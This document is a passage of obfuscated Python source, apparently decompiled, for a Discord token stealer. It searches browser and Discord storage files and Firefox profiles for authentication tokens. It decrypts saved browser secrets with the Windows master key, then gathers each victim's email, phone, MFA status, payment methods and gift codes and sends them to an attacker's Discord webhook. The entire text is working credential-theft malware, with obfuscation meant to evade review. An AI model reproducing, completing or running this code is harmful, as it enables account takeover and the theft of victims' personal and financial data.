                                        QEMVJFXSKLUVQUGYMXNOASHBCIVJZTIGXUYJSOFGUVWTPAAWVUWLEHCQLHVCVDYDDDQONSKDPTGOKPDK.append(VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF)
                                        VGKKBHPRDJLQNXCNQIDUDWPLRNQKSAXFCGCTKXKFYQDUVDXRJRVARBLHVZDUNVNBZTHVZLDGRVGQVD[NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW] = (PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS, f'{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}\\{v4r_file_name}')
            else:  # inserted
                for v4r_file_name in os.listdir(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
                    if v4r_file_name[(-3):] not in ['log', 'ldb']:
                        continue
                    with open(f'{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW in re.findall(JSDJMPCOMYMLNLMAMJIWBMSSIGJKZNPHWGFWNOVQYLJCYXGASCHMNHVSHAAQITTDDQAWTMQUKFWGAWEVLSEOQYP, v4r_line.strip()):
                                if validate_t0k3n(NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW, RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO):
                                    VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF = requests.get(RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO, headers={'Authorization': NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW}).json()['id']
                                    if VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF not in QEMVJFXSKLUVQUGYMXNOASHBCIVJZTIGXUYJSOFGUVWTPAAWVUWLEHCQLHVCVDYDDDQONSKDPTGOKPDK:
                                        NKDJFQLZMZOOAKSSMJOVHMPADOCQBRUDYOJFWDZDVJUXFACCGPSVVIIJAGILUQJCXOTRVUOTYNYTTDFFSHSI.append(NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW)
                                        QEMVJFXSKLUVQUGYMXNOASHBCIVJZTIGXUYJSOFGUVWTPAAWVUWLEHCQLHVCVDYDDDQONSKDPTGOKPDK.append(VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF)
                                        VGKKBHPRDJLQNXCNQIDUDWPLRNQKSAXFCGCTKXKFYQDUVDXRJRVARBLHVZDUNVNBZTHVZLDGRVGQVD[NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW] = (PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS, f'{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}\\{v4r_file_name}')
        if os.path.exists(BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + '\\Mozilla\\Firefox\\Profiles'):
            for XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, _, v4r_files in os.walk(BERCVFRKFAHFDCSICRTORSMNMIHCMJYBGUYYNBYUELUYBETWHVCIWNJSFZIADTXHOB + '\\Mozilla\\Firefox\\Profiles'):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW in re.findall(JSDJMPCOMYMLNLMAMJIWBMSSIGJKZNPHWGFWNOVQYLJCYXGASCHMNHVSHAAQITTDDQAWTMQUKFWGAWEVLSEOQYP, v4r_line.strip()):
                                    if validate_t0k3n(NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW, RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO):
                                        VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF = requests.get(RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO, headers={'Authorization': NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW}).json()['id']
                                        if VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF not in QEMVJFXSKLUVQUGYMXNOASHBCIVJZTIGXUYJSOFGUVWTPAAWVUWLEHCQLHVCVDYDDDQONSKDPTGOKPDK:
                                            NKDJFQLZMZOOAKSSMJOVHMPADOCQBRUDYOJFWDZDVJUXFACCGPSVVIIJAGILUQJCXOTRVUOTYNYTTDFFSHSI.append(NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW)
                                            QEMVJFXSKLUVQUGYMXNOASHBCIVJZTIGXUYJSOFGUVWTPAAWVUWLEHCQLHVCVDYDDDQONSKDPTGOKPDK.append(VRHQHUHDITAEKJOJGRYAOXLMAZTQLVXTLCUNYOETLTYLWKFWNGKFAZARLTQCDHEMKMSNSFBOUZDCYVCCWMHICMGLUGIVFF)
                                            VGKKBHPRDJLQNXCNQIDUDWPLRNQKSAXFCGCTKXKFYQDUVDXRJRVARBLHVZDUNVNBZTHVZLDGRVGQVD[NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW] = ('Firefox', f'{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}\\{v4r__file}')
        return (NKDJFQLZMZOOAKSSMJOVHMPADOCQBRUDYOJFWDZDVJUXFACCGPSVVIIJAGILUQJCXOTRVUOTYNYTTDFFSHSI, VGKKBHPRDJLQNXCNQIDUDWPLRNQKSAXFCGCTKXKFYQDUVDXRJRVARBLHVZDUNVNBZTHVZLDGRVGQVD)

    def validate_t0k3n(NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW, RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO):
        return requests.get(RRLEJSWYPCJRYWSJAIRJDJZZUPTPPHSKVWYXCDYHTEFJVTWGQMUMKHLEMCQLMO, headers={'Authorization': NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW}).status_code == 200

    def decrypt_val(OMUTMRWOHIOAIQYTIKNFCPPGFQOHCOORCWRWFHUCRAGIHYPMBESMNTZLYUCCPFXGMTTYVMNDQGWCJITFZPMXHBJVIBOQCTRL, OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC):
        v4r_iv = OMUTMRWOHIOAIQYTIKNFCPPGFQOHCOORCWRWFHUCRAGIHYPMBESMNTZLYUCCPFXGMTTYVMNDQGWCJITFZPMXHBJVIBOQCTRL[3:15]
        v4r_payload = OMUTMRWOHIOAIQYTIKNFCPPGFQOHCOORCWRWFHUCRAGIHYPMBESMNTZLYUCCPFXGMTTYVMNDQGWCJITFZPMXHBJVIBOQCTRL[15:]
        v4r_cipher = AES.new(OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC, AES.MODE_GCM, v4r_iv)
        return v4r_cipher.decrypt(v4r_payload)[:(-16)].decode()

    def get_master_key(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
        if not os.path.exists(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN):
            return
        with open(XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN, 'r', encoding='utf-8') as v4r_f:
            v4r_local_state = json.load(v4r_f)
        OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC = base64.b64decode(v4r_local_state['os_crypt']['encrypted_key'])[5:]
        return CryptUnprotectData(OVAFECEDDXTFRAQWJKGLKSBXNVAYZSFMKBCVXKBLKEXIIOUXBLHENMUZSXIPACTPC, None, None, None, 0)[1]

    def upload_t0k3n5():
        NKDJFQLZMZOOAKSSMJOVHMPADOCQBRUDYOJFWDZDVJUXFACCGPSVVIIJAGILUQJCXOTRVUOTYNYTTDFFSHSI, VGKKBHPRDJLQNXCNQIDUDWPLRNQKSAXFCGCTKXKFYQDUVDXRJRVARBLHVZDUNVNBZTHVZLDGRVGQVD = extr4ct_t0k3n5()
        HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW = SyncWebhook.from_url(YISFUMZNBSQOHJTWRLDKXATHEJBMDWMKCOJCMOGKOTOIIHFAZCK)
        if not NKDJFQLZMZOOAKSSMJOVHMPADOCQBRUDYOJFWDZDVJUXFACCGPSVVIIJAGILUQJCXOTRVUOTYNYTTDFFSHSI:
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK = Embed(title=f'Discord Token `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', description='No discord tokens found.', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE)
            IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK.set_footer(text=UCDSLAQDCVXIWSTDCAOPBUTXYGIXDKZLQMPJNHORITFVBQUEVVXRJLUKENJ, icon_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
            HEVYSHBUSPMJMIBDUMAOQTDGZEISUXJZVYYXPLWWEOSEPKMAUKOFNXPWZILKXLEZJNAUIGPGFZUOTSEDVNNUW.send(embed=IPIGIRYFNTWFZMGMMOWQRVGXJQCGXWCSTBAFXIWHYUKRILOIDEHQPFRWVVXOVK, username=NWILWYNOORHWSHOHRGGENTLTWIIMUCBEHODOWUOFPUKPVFERTENRUNPCJRQQZGJDXBTPFNMPMKKTYCCPETMJZFLJJNTP, avatar_url=WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM)
            return
        for NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW_d15c0rd in NKDJFQLZMZOOAKSSMJOVHMPADOCQBRUDYOJFWDZDVJUXFACCGPSVVIIJAGILUQJCXOTRVUOTYNYTTDFFSHSI:
            KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW_d15c0rd}).json()
            GUPSCSQBGMJEXHIQCCPWPUMIGRTKDOHBJHSAXCEZNHMJZCBOJXWYJJLTMZ = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('username', 'None') + '#' + KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('discriminator', 'None')
            TORLBQQFRNQWRZWHVUGRZHTBFSWBFBJVYBSQEPQDRUPJKAONNRAWCQUPNCOCAFWHYB = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('global_name', 'None')
            YWYKBJIJNEAGDMGGSSVHZDGJTYNAWDARLBVSGQJZEHIUAXFUMFLWXQPIACUZXLUSSKKKRNVVHWGLANYJLKLUHSSDUO = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('id', 'None')
            YEHIWIETBVTHBBUIQOFNGEZQIRAWIGLLPJWZBGIBFEPHWQALDPRUMSAKESMEACBURKAUVPLOPFIQIPCHGUZPXQBMBSYQSAPUWHJO = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('email', 'None')
            ZIRCKVYJMWLTKJLRBVYJSXCYDRSBCNRUDDSGTVLKKZUELKAUHKATOIOEQHJPKAEQXTJNDOSFMFISAYEPVZMYGLVKRUS = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('verified', 'None')
            YLUUIOSRPOBQSLTDPIFQZCGGTZNLYGRVTGEIFZHYBARBWSMIVRLRUNPHEZDXTQXSQWZLLDJWDXPAWZPEAGPZXSSDPPAKWTH = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('phone', 'None')
            XQWVYWRBAAEERRYTGPOOJZACQMEELSHQLZQGGGLDGKOMAJHLOEYGJLWLSLGBFRLUUA = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('locale', 'None')
            AFLIMDMTYTUZRFTHTTDIVWGPKDHSVEDTTLLRBTTYHADYFROZBUNFKGZIJCH = KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('mfa_enabled', 'None')
            try:
                if KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('premium_type', 'None') == 0:
                    ZGCVXAAOBGKSQIJZGLIDLHHRNXBRXIDYXFSEEICZWFYOXHCNPQYATRRGVPVDZBIGKSBHBVMZHRYXZYZNKWLI = 'False'
                else:  # inserted
                    if KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('premium_type', 'None') == 1:
                        ZGCVXAAOBGKSQIJZGLIDLHHRNXBRXIDYXFSEEICZWFYOXHCNPQYATRRGVPVDZBIGKSBHBVMZHRYXZYZNKWLI = 'Nitro Classic'
                    else:  # inserted
                        if KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('premium_type', 'None') == 2:
                            ZGCVXAAOBGKSQIJZGLIDLHHRNXBRXIDYXFSEEICZWFYOXHCNPQYATRRGVPVDZBIGKSBHBVMZHRYXZYZNKWLI = 'Nitro Boosts'
                        else:  # inserted
                            if KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU.get('premium_type', 'None') == 3:
                                ZGCVXAAOBGKSQIJZGLIDLHHRNXBRXIDYXFSEEICZWFYOXHCNPQYATRRGVPVDZBIGKSBHBVMZHRYXZYZNKWLI = 'Nitro Basic'
                            else:  # inserted
                                ZGCVXAAOBGKSQIJZGLIDLHHRNXBRXIDYXFSEEICZWFYOXHCNPQYATRRGVPVDZBIGKSBHBVMZHRYXZYZNKWLI = 'False'
            except:
                ZGCVXAAOBGKSQIJZGLIDLHHRNXBRXIDYXFSEEICZWFYOXHCNPQYATRRGVPVDZBIGKSBHBVMZHRYXZYZNKWLI = 'None'
            try:
                JMYKVYMGIPCIKAOEIXFQSWUYAOVJNHHQMLKNSZISJRSGZKLZTMAAMHUXKCSFNKFRMAHVMKEG = f"https://cdn.discordapp.com/avatars/{YWYKBJIJNEAGDMGGSSVHZDGJTYNAWDARLBVSGQJZEHIUAXFUMFLWXQPIACUZXLUSSKKKRNVVHWGLANYJLKLUHSSDUO}/{KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{YWYKBJIJNEAGDMGGSSVHZDGJTYNAWDARLBVSGQJZEHIUAXFUMFLWXQPIACUZXLUSSKKKRNVVHWGLANYJLKLUHSSDUO}/{KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{YWYKBJIJNEAGDMGGSSVHZDGJTYNAWDARLBVSGQJZEHIUAXFUMFLWXQPIACUZXLUSSKKKRNVVHWGLANYJLKLUHSSDUO}/{KQZBVNWPUVABOWHCTLXVQPYPOIEFAHEJYRXEKMYHXQJLZVLGODOWTEYRUHDNZPFGIITLKJSZQILUSNDIZRKXWKIVBINPTMU['avatar']}.png"
            except:
                JMYKVYMGIPCIKAOEIXFQSWUYAOVJNHHQMLKNSZISJRSGZKLZTMAAMHUXKCSFNKFRMAHVMKEG = WMKOWXGKEDEGRKABUHAUCHMYNXNGVEJTPOPQBYTWTSKNSGQUKIFMYFWFBFDDPUDXSZHECPEIUJYJODGCCOM
            try:
                AMDXJDVVZDOPAMBLPLYVJXGHUQNWKBFOYQGXLSIOVXWVPHJZOUQHWCXHY = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW_d15c0rd}).json()
                if AMDXJDVVZDOPAMBLPLYVJXGHUQNWKBFOYQGXLSIOVXWVPHJZOUQHWCXHY:
                    LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX = []
                    for v4r_method in AMDXJDVVZDOPAMBLPLYVJXGHUQNWKBFOYQGXLSIOVXWVPHJZOUQHWCXHY:
                        if v4r_method['type'] == 1:
                            LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX.append('CB')
                        else:  # inserted
                            if v4r_method['type'] == 2:
                                LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX.append('Paypal')
                            else:  # inserted
                                LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX.append('Other')
                    LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX = ' / '.join(LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX)
                else:  # inserted
                    LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX = 'None'
            except:
                LCMEIYZPXJZQKYPSXNSECOMFXIROVNOWSYWKTWTYJTVPSXKXHIX = 'None'
            try:
                KZJSUEDJJZMJXJGDVMWCBFDGUZBIWDNAIACIODKFEVDKBXMMLDBLRYRZFMJLIQD = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW_d15c0rd}).json()
                if KZJSUEDJJZMJXJGDVMWCBFDGUZBIWDNAIACIODKFEVDKBXMMLDBLRYRZFMJLIQD:
                    YQEGNSNLUZNDWRDAXYPAZDSKJQKNVSBHCEJNBTERGRDZSVUOXGJLLNLIXTKXLLGKEPNBSWEDKSOQCLUJXMSYPOIWHFFKSOBS = []
                    for RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT in KZJSUEDJJZMJXJGDVMWCBFDGUZBIWDNAIACIODKFEVDKBXMMLDBLRYRZFMJLIQD:
                        PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS = RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT['promotion']['outbound_title']
                        RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT = RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT['code']
                        UOHLDWCNNWPMHSTDCRSJHQTROJQTGUVCYSHNYAPIECAWCVKMVDYFTBUIESCKQXDTKZXIKEAPVBZIMKNZVXKREZIV = f'Gift: {PDCLNSGSPFMDZUAGPKNYDMEBTTHZMLRHAAAMAZEQBWGDRAGHQBTHJNFOGHCULPYS}\nCode: {RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT}'
                        if len('\n\n'.join(RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT)) + len(UOHLDWCNNWPMHSTDCRSJHQTROJQTGUVCYSHNYAPIECAWCVKMVDYFTBUIESCKQXDTKZXIKEAPVBZIMKNZVXKREZIV) >= 1024:
                            break
                        YQEGNSNLUZNDWRDAXYPAZDSKJQKNVSBHCEJNBTERGRDZSVUOXGJLLNLIXTKXLLGKEPNBSWEDKSOQCLUJXMSYPOIWHFFKSOBS.append(UOHLDWCNNWPMHSTDCRSJHQTROJQTGUVCYSHNYAPIECAWCVKMVDYFTBUIESCKQXDTKZXIKEAPVBZIMKNZVXKREZIV)
                    if len(YQEGNSNLUZNDWRDAXYPAZDSKJQKNVSBHCEJNBTERGRDZSVUOXGJLLNLIXTKXLLGKEPNBSWEDKSOQCLUJXMSYPOIWHFFKSOBS) > 0:
                        RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT = '\n\n'.join(YQEGNSNLUZNDWRDAXYPAZDSKJQKNVSBHCEJNBTERGRDZSVUOXGJLLNLIXTKXLLGKEPNBSWEDKSOQCLUJXMSYPOIWHFFKSOBS)
                    else:  # inserted
                        RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT = 'None'
                else:  # inserted
                    RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT = 'None'
            except:
                RQMEVMFACQGAABRNOYPTTUHXDSBIQHQNEFLMSIIADCCTDAYOBGTLMXQXGJGUMZARYOCJQWBT = 'None'
            v4r_software_name, XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN = VGKKBHPRDJLQNXCNQIDUDWPLRNQKSAXFCGCTKXKFYQDUVDXRJRVARBLHVZDUNVNBZTHVZLDGRVGQVD.get(NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW_d15c0rd, ('Unknown Software', 'Unknown location'))
            embed = Embed(title=f'Discord Token `{POOQVHPZSIVCSATMQFCRZMVLGIJZFRFFSELPQEWVIWCGYLMGRHOZTGZJBWKDR} \"{WFMGCCEVIPSXGHSXGXFSMCPGDBHDQWYYNNHTLRYLKEVEFCRTGSNAKBDQEKNXBMOHHLYSRDBWMMGVCQTXTNNSWOSJUNP}\"`:', color=OYLUXSBEMQVAZDUZITFQCBYLXSEUUPLRMCZUJIHCNAYEHDIFYFJYYYEECIOYTUDBBYEEEYOZQRABANOGVIVJGJFUNMSITZFRKGE)
            embed.add_field(name=':file_folder: Path:', value=f'```{XGOUPYAPPZPJJMWVTAYWRLEXCABAGUFYAYTYTRLXNOAXIZGXMNYAKMPSN}```', inline=True)
            embed.add_field(name=':globe_with_meridians: Token:', value=f'```{NJVTEMPJCZRNTKOKWLLMXMWRSWUXTZCNWNFGOITNTASVZSEYHKXUEMENUFLZGGLQGOAVJIJLZNAGZYAVMFXWTRW_d15c0rd}```', inline=True)
            embed.add_field(name=':package: Software:', value=f'```{v4r_software_name}```', inline=True)
            embed.add_field(name=':bust_in_silhouette: Username:', value=f'```{GUPSCSQBGMJEXHIQCCPWPUMIGRTKDOHBJHSAXCEZNHMJZCBOJXWYJJLTMZ}```', inline=True)
            embed.add_field(name=':bust_in_silhouette: Display Name:', value=f'```{TORLBQQFRNQWRZWHVUGRZHTBFSWBFBJVYBSQEPQDRUPJKAONNRAWCQUPNCOCAFWHYB}```', inline=True)
            embed.add_field(name=':robot: Id:', value=f'```{YWYKBJIJNEAGDMGGSSVHZDGJTYNAWDARLBVSGQJZEHIUAXFUMFLWXQPIACUZXLUSSKKKRNVVHWGLANYJLKLUHSSDUO}```', inline=True)
            embed.add_field(name=':e_mail: Email:', value=f'```{YEHIWIETBVTHBBUIQOFNGEZQIRAWIGLLPJWZBGIBFEPHWQALDPRUMSAKESMEACBURKAUVPLOPFIQIPCHGUZPXQBMBSYQSAPUWHJO}```', inline=True)
            embed.add_field(name=':white_check_mark: Email Verified:', value=f'```{ZIRCKVYJMWLTKJLRBVYJSXCYDRSBCNRUDDSGTVLKKZUELKAUHKATOIOEQHJPKAEQXTJNDOSFMFISAYEPVZMYGLVKRUS}```', inline=True)
            embed.add_field(name=':telephone_receiver: Phone:', value=f'```{YLUUIOSRPOBQSLTDPIFQZCGGTZNLYGRVTGEIFZHYBARBWSMIVRLRUNPHEZDXTQXSQWZLLDJWDXPAWZPEAGPZXSSDPPAKWTH}```', inline=True)
            embed.add_field(name=':rocket: Nitro:', value=f'```{ZGCVXAAOBGKSQIJZGLIDLHHRNXBRXIDYXFSEEICZWFYOXHCNPQYATRRGVPVDZBIGKSBHBVMZHRYXZYZNKWLI}```', inline=True)
